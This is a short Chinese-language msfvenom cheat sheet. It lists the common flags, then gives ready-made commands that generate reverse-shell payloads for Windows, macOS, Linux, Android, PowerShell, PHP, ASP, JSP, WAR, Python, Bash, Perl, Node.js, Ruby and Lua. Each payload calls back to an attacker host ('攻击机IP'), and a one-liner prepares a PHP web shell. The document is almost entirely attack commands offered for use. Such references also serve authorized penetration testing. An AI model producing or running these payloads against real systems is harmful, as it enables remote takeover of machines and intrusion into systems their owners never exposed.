使用msfvenom -h
命令查看所有参数
常用参数:1
2
3
4
5-p 设置 payload
-e 设置编码方式
-a 系统结构,默认x86
-f 生成文件格式
-o 保存 payload
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=
LPORT= -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=
LPORT= -f macho > shell.macho
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=
LPORT= -f elf > shell.elf
Android
//需要签名
msfvenom -a x86 –platform Android -p android/meterpreter/reverse_tcp LHOST=LPORT= -f apk -o payload.apk
Powershell
msfvenom -a x86 –platform Windows -p windows/powershell_reverse_tcp LHOST=
LPORT= -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=
LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=
LPORT= -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=
LPORT= -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=
LPORT= -f war > shell.war
Python
msfvenom -p cmd/unix/reverse_python LHOST=
LPORT= -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=
LPORT= -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=
LPORT= -f raw > shell.pl
Nodejs
msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.js
Ruby
msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.rb
Lua
msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.lua
参考链接:
https://github.com/micro8/Gitbook/blob/master/Chapter1/10_msfvenom%E5%B8%B8%E7%94%A8%E7%94%9F%E6%88%90payload%E5%91%BD%E4%BB%A4.md
https://www.cnblogs.com/zlgxzswjy/p/6881904.html